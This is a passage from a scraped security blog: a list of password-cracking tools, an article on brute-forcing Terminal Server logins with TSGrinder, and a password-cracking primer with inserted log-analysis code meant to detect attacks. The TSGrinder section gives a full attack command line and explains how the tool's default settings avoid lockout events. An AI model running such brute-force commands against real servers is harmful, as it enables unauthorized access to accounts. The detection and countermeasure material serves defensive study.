Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 
It is also <a href="http://www.oxid.it/ca_um/">well documented</a>.<br /><br /><span style="font-size:+1;">#2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://www.openwall.com/john/"><img src="http://mirror.sectools.org/logos/john-80x163.png" align="right" border="0" width="80" height="163" /></a> <a href="http://www.openwall.com/john/">John the Ripper</a> : A powerful, flexible, and <i>fast</i> multi-platform password hash cracker<br />John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find <a href="ftp://ftp.mirrorgeek.com/openwall/wordlists">here</a>, <a href="ftp://ftp.ox.ac.uk/pub/wordlists/">here</a>, or <a href="http://www.outpost9.com/files/WordLists.html">here</a>. 
<br /><br /><span style="font-size:+1;">#3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://www.thc.org/thc-hydra/"><img src="http://mirror.sectools.org/logos/hydra-80x79.png" align="right" border="0" width="80" height="79" /></a> <a href="http://www.thc.org/thc-hydra/">THC Hydra</a> : A fast network authentication cracker which supports many different services<br />When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like <a href="http://sectools.org/index.html#amap">THC Amap</a>, this release is from the fine folks at <a href="http://www.thc.org/">THC</a>. 
<br /><br /><span style="font-size:+1;">#4</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://www.aircrack-ng.org/"><img src="http://mirror.sectools.org/logos/aircrack-80x63.png" align="right" border="0" width="80" height="63" /></a> <a href="http://www.aircrack-ng.org/">Aircrack</a> : The fastest available WEP/WPA cracking tool<br />Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. 
The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).<br /><br /><span style="font-size:+1;">#5</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> <a href="http://www.l0phtcrack.com/"><img src="http://mirror.sectools.org/logos/l0phtcrack-64x64.gif" align="right" border="0" width="64" height="64" /></a> <a href="http://www.l0phtcrack.com/">L0phtcrack</a> : Windows password auditing and recovery application<br />L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc.). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and <a href="http://www.l0phtcrack.com/">reborn as LC6 in 2009</a>. For free alternatives, consider <a href="http://ophcrack.sourceforge.net/">Ophcrack</a>, <a href="http://sectools.org/crackers.html#cain">Cain and Abel</a>, or <a href="http://sectools.org/crackers.html#john">John the Ripper</a>. 
<br /><br /><span style="font-size:+1;">#6</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> <a href="http://airsnort.shmoo.com/"><img src="http://mirror.sectools.org/logos/airsnort-80x41.png" align="right" border="0" width="80" height="41" /></a> <a href="http://airsnort.shmoo.com/">Airsnort</a> : 802.11 WEP Encryption Cracking Tool<br />AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the <a href="http://www.shmoo.com/">Shmoo Group</a> and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar <a href="http://sectools.org/crackers.html#aircrack">Aircrack</a>. 
<p>Also categorized as: <a href="http://sectools.org/wireless.html">wireless tools</a></p><p><br /></p><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#7</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.solarwinds.net/"><img src="http://mirror.sectools.org/logos/solarwinds-80x47.png" align="right" border="0" width="80" height="47" /></a> <a href="http://www.solarwinds.net/">SolarWinds</a> : A plethora of network discovery/monitoring/attack tools<br />SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more. 
<p>Also categorized as: <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="pwdump"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#8</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.foofus.net/fizzgig/pwdump/">Pwdump</a> : A Windows password recovery tool<br />Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file. 
</td></tr></tbody></table><hr /><a name="rainbowcrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#9</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.antsight.com/zsl/rainbowcrack/">RainbowCrack</a> : An Innovative Password Hash Cracker<br />The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. 
</td></tr></tbody></table><hr /><a name="brutus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#10</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.hoobie.net/brutus/">Brutus</a> : A network brute-force authentication cracker<br />This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at <a href="http://sectools.org/crackers.html#hydra">THC Hydra</a>. </td></tr></tbody></table><p> </p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-52259671139037653502009-07-29T05:06:00.000-07:002009-07-29T05:12:14.357-07:00Brute Force Hacking In Terminal Server Environments<p id="article-anonce">One of the most common techniques used by hackers to penetrate your network is just plain-old password guessing. This goes for external hacking attempts as well as internal hacking attempts. In this article I will discuss how hackers can use tools to perform brute force password hacking in your Terminal Server environments and what you can do to prevent these kinds of attacks.</p> <h2>Introduction</h2> <p>Guessing passwords is one of the oldest, yet one of the most effective techniques to gain access to a system. The reason that it is one of the most effective hacking techniques is that there’s a weak link in the whole process: humans. This is because humans like “samantha1” better for a password than “Tr15%^<<lopi>!+”. 
Although the latter would be far more difficult to hack than the first password, there’s a good chance that no user would ever get the latter password memorized.</p> <p>This is what hackers take advantage of. The only thing a hacker needs is a logon “vehicle”. This could be a command prompt, a web page or… the Microsoft Remote Desktop Connection conveniently included in every recent version of Windows or readily available from Microsoft’s download site.</p> <h2>Hacking Slang</h2> <p>For clarity’s sake, I’ll briefly discuss some of the terms used in relation to password hacking. Basically, there are two kinds of password hacking attacks:</p> <ul><li>Brute force hacking a.k.a. dictionary hacking attacks </li><li>Password cracking a.k.a. hash hacking attacks.</li></ul> <p>In this article we will be focusing on brute force hacking, using dictionary attacks. This simply means that the hacker will use a tool to automate the password guessing with an accompanying dictionary file: a file that contains every single password the hacker wants to try. Usually there are tens of thousands of passwords in a dictionary file and the hacking tool tries them all, pounding the server with logon attempts: hence the term brute force hacking.</p> <h2>Impact Of Password Guessing in Terminal Server environments</h2> <p>As in other fields of security, Terminal Server environments take up a special place. This is because Terminal Servers, by their very nature, allow interactive access. Interactive access in this context means that you’re logged on to the server itself. This is the same effect as if you were walking up to the console in the datacenter and logging on there. This basically allows you to execute any program you can get your hands on and run it in the memory space of that server.</p> <p>Another significant issue that arises from the fact that Terminal Servers are in the business of allowing interactive access is an issue with the admin lockout. 
As you probably know, by default, the local administrator account cannot be locked out. Even if you use the passprop utility, you can only lock out the administrator account for remote logons, not interactive (Terminal Server) logons. Only using passprop on Windows Server 2003 allows you to lock out the local administrator account. Because this could effectively completely lock you out of your own network, this isn’t a configuration that is used a lot. Hackers know this and use this knowledge to perform brute force hacking attempts on administrator accounts.</p> <h2>Terminal Server Brute Force Hacking tool: TSGrinder</h2> <div class="Section2"> <p>There are a couple of tools out there which allow you to perform brute-force password guessing in your Terminal Server environment. The most well-known however is a free tool called <a href="http://www.hammerofgod.com/download/tsgrinder-2.03.zip" target="_blank"><strong>TSGrinder</strong></a>. TSGrinder is a command line tool which very basically allows automating password guessing via RDP connections. TSGrinder is a "dictionary"-based attack tool that supports multiple attack windows from a single dictionary file (you can specify this on the program command line). </p> <p>A very interesting option in the program is the “leet” function. This leet function enables the program to cope with a popular development in password-land. What I mean is that, from the knowledgeable user up, people tend to secure their passwords by replacing letters with well-known symbols. For example, password becomes p@ssw0rd (replacing a’s with @’s and o’s with 0’s). This is a very well thought-through option because, as we will see, trying these passwords does not require you to change your dictionary file. </p> <p>Another very interesting option is the “banner” option. What this option does is acknowledge any messages prior to log on. 
These are the kinds of messages that you have to acknowledge before you can log on to a server, usually a legal disclaimer of some sort. This logon message can be set in Group Policy in Computer Policies > Security Settings > Local Policies > Security Settings > Interactive Logon. </p> <p>This was an issue in earlier versions of TSGrinder but that has been fixed now. This option basically renders the banner message useless as a countermeasure to these kinds of attacks. </p> <p>TSGrinder also supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection (the default is 5). This is used by hackers to help avoid detection, because by default after 5 unsuccessful logon attempts, the Terminal Server ends the connection and an event is logged to the Terminal Server event log. The event looks like this:</p></div> <blockquote dir="ltr"> <p><img alt="" src="http://www.msterminalservices.org/img/upl/image0021153396955524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <p>So in the default config of TSGrinder you could have someone trying about 1,000,000 passwords and there would not be a single event in the event log (auditing excluded, we’ll get to that).</p> <p>Let’s take a look at TSGrinder. The program comes with a very limited dictionary and leet file. You can be sure that hackers have far more advanced dictionaries. 
Running TSGrinder from the command line yields the help:<br /><br /></p> <blockquote dir="ltr" style="margin-right: 0px;"> <p dir="ltr"> </p><table border="1" cellpadding="0" cellspacing="0"> <tbody> <tr> <td valign="top" width="590"> <p><b>Usage:</b></p> <p><b> tsgrinder.exe [options] server</b></p> <p> </p> <p><b>Options:</b></p> <p><b> -w dictionary file (default 'dict')</b></p> <p><b> -l 'leet' translation file</b></p> <p><b> -d domain name</b></p> <p><b> -u username (default 'administrator'</b></p> <p><b> -b banner flag</b></p> <p><b> -n number of simultaneous threads</b></p> <p><b> -D debug level (default 9, lower number is more output)</b></p> <p> </p> <p><b>Example:</b></p> <p><b> tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1</b></p></td></tr></tbody></table></blockquote> <p>As you can see usage is pretty straight-forward. You can try it on your own test server, just like I did. </p> <blockquote dir="ltr" style="margin-right: 0px;"> <p dir="ltr"> </p><table border="1" cellpadding="0" cellspacing="0"> <tbody> <tr> <td width="590"> <p align="center"><b>Disclaimer</b>: Use extreme caution when using this tool. 
Using TSGrinder could result in legal actions taken against you because your actions could be considered a real hacking attempt.</p></td></tr></tbody></table></blockquote> <p>In this very simple example we will assume that:</p> <ul><li>we have a dictionary file called “testdict” </li><li>we have a leetfile called “testleet” </li><li>the username we are attacking is the default, administrator </li><li>we want to acknowledge any logon banner messages </li><li>we want to have 1 simultaneous thread </li><li>the server we are attacking has the following IP address: 192.168.62.53</li></ul> <p>That would leave us with the following command line: </p> <blockquote dir="ltr" style="margin-right: 0px;"> <p><i>tsgrinder.exe -w testdict -l testleet -b -n 1 -D 8 192.168.62.53</i></p></blockquote> <p>As you can see in the screenshot below, after a while, tsgrinder neatly finds that I’ve been using P@55w0rd! as my administrator password. It’s that easy.</p> <blockquote dir="ltr"> <p><img alt="" src="http://www.msterminalservices.org/img/upl/image0041153397962524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <h2>Countermeasures</h2> <p>OK, now that you’ve seen how easy it is to attack your Terminal Server environment, it’s time to take countermeasures. Here are some concrete suggestions that can help prevent these kinds of attacks.</p> <p><strong>Rename administrator account</strong></p> <p>You should know that renaming the administrator account is considered a best practice. If you were not aware of that earlier, I sure hope you are now. When you rename the (local) administrator account, the hacker cannot use the administrator account to attack and must know the exact name of the renamed administrator account. 
This also has the added advantage that you can create a dummy administrator account that <i>can</i> be locked out (you do have account lockouts configured, right?).</p> <p><strong>Connection Security</strong></p> <p>Ideally you would want to make sure that users are already somehow checked <i>before</i> they attempt to log on to a Terminal Server. This used to be a huge hassle but now there’s a free tool available that does just that and more! The tool is called <a href="http://www.2x.com/securerdp/" target="_blank"><strong>2X SecureRDP</strong></a>. 2X SecureRDP works by accepting or denying incoming RDP connections by IP, Mac address, computer name, client version or based on time of day, before the logon screen is even displayed. This significantly enhances the control you have over your Terminal Servers. As an added bonus you can limit users to one concurrent session. This doesn’t really prevent brute force attacks from happening but it’s a very nice feature that I know many administrators are looking for. Another great feature of this program is that you can log information for every allowed or denied connection and save it to a log file. Below is a screenshot of 2X SecureRDP.</p> <blockquote dir="ltr"> <p><img alt="" src="http://www.msterminalservices.org/img/upl/image0061153397962524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <p>Of course, this tool is not just for Terminal Servers. It suits every server you access via RDP. In fact, I recommend using this tool on every RDP enabled server.</p> <p><strong>Auditing</strong></p> <p>Enable extensive auditing. OK, so this doesn’t <i>prevent</i> brute force attacks from happening but at the very least it allows you to log these kinds of attacks. You should audit successful and failed logon events. Because these audit logs tend to get cluttered very soon on a busy server, you should consider an automated audit tool. 
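</p>
<p>The filtering such a tool performs, combined with the decoy administrator account suggested above, can be sketched as follows. This is an added example, not code from the original article or from any product it names; the export format, the account name svc-admin, the client addresses and the thresholds are all assumptions, and the sample records are constructed.</p>

```python
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "time outcome account source")

# Constructed sample export (not real log data). Assumed format, one logon
# attempt per line: ISO timestamp, FAIL or OK, target account, client address.
# "svc-admin" stands for the renamed administrator account (hypothetical name);
# "administrator" is the decoy account that nobody legitimately uses.
SAMPLE_LOG = """\
2009-07-29T02:58:10 OK   jsmith        192.168.62.20
2009-07-29T03:00:01 FAIL svc-admin     192.168.62.77
2009-07-29T03:00:03 FAIL svc-admin     192.168.62.77
2009-07-29T03:00:05 FAIL svc-admin     192.168.62.77
2009-07-29T03:00:07 FAIL svc-admin     192.168.62.77
2009-07-29T03:00:09 FAIL svc-admin     192.168.62.77
2009-07-29T03:00:40 FAIL svc-admin     192.168.62.77
2009-07-29T03:01:15 OK   svc-admin     192.168.62.77
2009-07-29T03:05:00 FAIL administrator 192.168.62.91
2009-07-29T09:00:00 FAIL jsmith        192.168.62.20
2009-07-29T09:00:20 OK   jsmith        192.168.62.20
"""


def parse_events(text):
    """Turn the export into Event records, oldest first."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] not in ("FAIL", "OK"):
            continue  # skip blank or malformed lines rather than guessing
        stamp, outcome, account, source = parts
        events.append(Event(datetime.fromisoformat(stamp), outcome,
                            account.lower(), source))
    return sorted(events, key=lambda e: e.time)


def detect(events, decoys=("administrator",), threshold=5,
           window=timedelta(minutes=10)):
    """Return alerts as (kind, source, account, time) tuples.

    decoy-account       any attempt against an account nobody should use
    failure-burst       `threshold` failed logons from one source in `window`
    success-after-burst a successful logon from a source that is mid-burst
    Failures are counted per attempt, so splitting the guesses over many
    short connections does not hide them from this check.
    """
    recent_failures = defaultdict(deque)  # source -> times of recent failures
    burst_reported = set()
    alerts = []
    for ev in events:
        failures = recent_failures[ev.source]
        # Drop failures that have aged out of the sliding window.
        while failures and ev.time - failures[0] > window:
            failures.popleft()
        if not failures:
            burst_reported.discard(ev.source)  # a later burst is reported again
        if ev.account in decoys:
            alerts.append(("decoy-account", ev.source, ev.account, ev.time))
        if ev.outcome == "FAIL":
            failures.append(ev.time)
            if len(failures) >= threshold and ev.source not in burst_reported:
                burst_reported.add(ev.source)
                alerts.append(("failure-burst", ev.source, ev.account, ev.time))
        elif len(failures) >= threshold:
            # The guessing stopped because one guess worked: highest priority.
            alerts.append(("success-after-burst", ev.source, ev.account, ev.time))
            failures.clear()
            burst_reported.discard(ev.source)
    return alerts


if __name__ == "__main__":
    for kind, source, account, when in detect(parse_events(SAMPLE_LOG)):
        print(f"{when.isoformat()} {kind:20} account={account} source={source}")
```

<p>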
These kinds of tools monitor and filter the security event logs for you so that you can see what you need to see and be alerted when anything goes bad. An example and my personal favorite of such a program is <a href="http://www.gfi.com/lanselm/" target="_blank"><strong>SELM</strong></a> (Security Event Log Monitor) from GFI. See a list of well-known similar programs <a href="http://www.windowsecurity.com/software/Event-Log-Monitoring/" target="_blank"><strong>here</strong></a>.</p> <p><strong>Logon Message</strong></p> <p dir="ltr">You should configure all of your servers to display a message at logon that must be acknowledged before you can proceed to log on to a server. This really isn’t a technical countermeasure but more of a legal one. Once you’ve acknowledged the logon message, there’s no way the perp can say: “I had no idea I wasn’t supposed to log on to that server”……..</p> <blockquote dir="ltr"> <p dir="ltr"><img alt="" src="http://www.msterminalservices.org/img/upl/image0081153397962524.jpg" align="baseline" border="0" hspace="0" /></p></blockquote> <h2 dir="ltr">Conclusion</h2> <p>Terminal Server environments are juicy targets for hackers. In this article I showed some techniques hackers can use to perform brute force attacks against local administrator accounts. I also showed you what you can do to prevent these attacks. Please keep in mind that these are just pointers and only make up a small part of the steps you should take to secure your Terminal Server environment.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-29017721019845527652009-07-29T05:03:00.000-07:002009-07-29T05:06:29.295-07:00Hacking techniques Introduction to password cracking<blockquote>Password and user account exploitation is one of the largest issues in network security. In this article Rob Shimonski will look at password cracking: the how and why of it. 
Rob will explain just how easy it is to penetrate a network, how attackers get in, the tools they use, and ways to combat it.</blockquote><p>Attacks on a company or organization's computer systems take many different forms, such as spoofing, smurfing, and other types of Denial of Service (DoS) attacks. These attacks are designed to harm or interrupt the use of your operational systems. This article deals with a single widespread form of attack known as <i>password cracking</i>.</p><p>Password cracking is a term used to describe the penetration of a network, system, or resource with or without the use of tools to unlock a resource that has been secured with a password. In this article I will take a look at what password cracking is, why attackers do it, how they achieve their goals, and what you can do to protect yourself. I will briefly take a look at the attackers themselves: their psychological makeup and their motives. Through an examination of several scenarios, I will describe some of the techniques they deploy and the tools that aid them in their assaults, and how password crackers work both internally and externally to violate a company's infrastructure. 
Finally, the article provides a checklist to help protect you from password cracking.</p><p>Before exploring the methods for doing this, let's first peer into the mind of the attacker and learn why they might want access to your network and systems.</p><p><a name="h1"><span class="atitle">Attackers: how and why they attack</span></a></p><p> There is an on-going debate about the definition of the word <i>hacker</i>. A hacker can be anyone with a deep interest in computer-based technology; it does not necessarily define someone who wants to do harm. The term <i>attacker</i> can be used to describe a malicious hacker. Another term for an attacker is a <i>black hat</i>. Security analysts are often called <i>white hats</i>, and <i>white-hat analysis</i> is the use of hacking for defensive purposes.</p><p>Attackers' motivations vary greatly. Some of the most notorious hackers are high school kids in their basements planted in front of their computers looking for ways to exploit computer systems. Other attackers are disgruntled employees seeking revenge on a company. And still other attacks are motivated by the sheer challenge of penetrating a well-secured system.</p><p><a name="h1"><span class="atitle">Methods of attack</span></a></p><p> Password cracking doesn't always involve sophisticated tools. 
It can be as simple as finding a sticky note with the password written on it stuck right to the monitor or hidden under a keyboard. Another crude technique is known as "dumpster diving," which basically involves an attacker going through your garbage to find discarded documentation that may contain passwords.</p><p>Of course attacks can involve far greater levels of sophistication. Here are some of the more common techniques used in password cracking: </p><ul><li> <b>Dictionary attack</b><br />A simple <i>dictionary</i> attack is by far the fastest way to break into a machine. A dictionary file (a text file full of dictionary words) is loaded into a cracking application (such as L0phtCrack), which is run against user accounts located by the application. Because the majority of passwords are often simplistic, running a dictionary attack is often sufficient to do the job.</li><li> <b>Hybrid attack</b><br />Another well-known form of attack is the <i>hybrid</i> attack. A hybrid attack will add numbers or symbols to the filename to successfully crack a password. Many people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month password is "cat"; second month password is "cat1"; third month password is "cat2"; and so on.</li><li> <b>Brute force attack</b><br />A <i>brute force</i> attack is the most comprehensive form of attack, though it may often take a long time to work depending on the complexity of the password. Some brute force attacks can take a week depending on the complexity of the password. 
L0phtcrack can also be used in a brute force attack.</li></ul><p>Next, take a look at some of the tools attackers use to break into a system.</p><p><a name="h1"><span class="atitle">Tools of the trade</span></a></p><p> One of the most popular tools is <b>L0phtCrack</b> (now called LC4). L0phtCrack is a tool that allows an attacker to take encrypted Windows NT/2000 passwords and convert them to plaintext. NT/2000 passwords are in cryptographic hashes and cannot be read without a tool like L0phtCrack. It works by attempting every alphanumeric combination possible to try to crack passwords.</p><p>Another commonly-used tool is a protocol analyzer (better known as a network sniffer, such as Sniffer Pro or Etherpeek), which is capable of capturing every piece of data on the network segment to which it is attached. When such a tool is running in <i>promiscuous mode</i>, it can "sniff" everything going around on that segment such as logins and data transfers. As you'll see later, this can seriously damage network security allowing attackers to capture passwords and sensitive data.</p><p>Let's take a look at a few scenarios and examine how attackers launch their attacks and how they might be stopped or prevented. 
I'll first describe a couple of scenarios involving internal attacks (that is, attacks that originate within an organization), and then take a look at a couple of scenarios involving external attacks.</p><p><a name="h1"><span class="atitle">Internal attacks</span></a></p><p> Internal attackers are the most common sources of cracking attacks because attackers have direct access to an organization's systems. The first scenario looks at a situation in which a disgruntled employee is the attacker. The attacker, a veteran systems administrator, has a problem with her job and takes it out on the systems she is trusted to administer, manage, and protect. </p><p><a name="h2"><span class="smalltitle">Example: The disgruntled employee</span></a></p><p> Jane Smith, a veteran system administrator with impeccable technical credentials, has been hired by your company to run the backup tapes during the late evenings. Your company, an ISP, has a very large data center with roughly 4000+ systems all monitored by a Network Operations Center. Jane works with two other technicians to monitor the overnight backups and rotate the tapes before the morning shift comes in. They all work independently of each other: one technician works on the UNIX Servers, one technician covers the Novell Servers, and Jane has been hired to work on the Windows 2000 Servers. </p><p>Jane has been working on the job for six months now and is a rising star. 
She comes in early, stays late and has asked to transfer to another department within the company. One problem: there are no open positions at the time. During the last month you (security analyst) have noticed a dramatic increase in the number of attempts at Cisco router and UNIX Server logins. You have CiscoSecure ACS implemented so you can audit the attempts and you see that most of them occur at 3 a.m.</p><p>Your suspicions are aroused, but as a security analyst, you can't go around pointing fingers without proof.</p><p>A good security analyst starts by looking deeper into the situation. You note that the attacks are from someone of high caliber and occur during Jane's shift, right after she is done with her tape rotation assignment and usually has an extra hour to study or read before the day operations team comes in. So you decide to have Jane supervised at night by the night operations manager. After three weeks of heavy supervision, you notice that the attacks have stopped. You were right. Jane was attempting to log into the Cisco routers and UNIX servers.</p><p>A good security analyst also needs to employ a good auditing tool, such as Tacacs+, to log attacks. Tacacs+ is a protocol used by applications such as CiscoSecure ACS that will force Authorization, Accountability, and Authentication (AAA for short). If you have Authorization, then the person requesting access needs to be authorized to access the system. If you have Authentication, then the user accessing a resource needs to be authenticated with rights and permissions to have access. What happens when you are authorized and also authenticated? You must be held Accountable. Accounting logs alone solve many password cracking problems by forcing an attacker to be held accountable, authenticated and authorized.</p><p>Next, I'll give an example of an old (but still widely used) attack, which involves <i>sniffing</i> passwords right off the network. 
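</p><p>The accounting trail described above is what lets the analyst see that the failed logins cluster at 3 a.m. and span both routers and UNIX servers. The following Python is an added example, not from the original article: it runs that check over constructed accounting records. The record layout, device names and addresses are assumptions for illustration and are not the CiscoSecure ACS log format.</p>

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed accounting records (assumed layout: timestamp, then key=value fields).
SAMPLE_LOG = """\
2009-03-02T03:04:10 nas=rtr-core-1 src=10.20.30.44 user=admin result=FAIL
2009-03-02T03:06:42 nas=rtr-edge-2 src=10.20.30.44 user=admin result=FAIL
2009-03-02T03:11:05 nas=unix-db-1 src=10.20.30.44 user=root result=FAIL
2009-03-02T09:15:31 nas=unix-db-1 src=10.20.31.7 user=mlee result=FAIL
2009-03-02T09:15:50 nas=unix-db-1 src=10.20.31.7 user=mlee result=PASS
2009-03-03T03:01:17 nas=rtr-core-1 src=10.20.30.44 user=enable result=FAIL
2009-03-03T03:03:58 nas=unix-db-1 src=10.20.30.44 user=root result=FAIL
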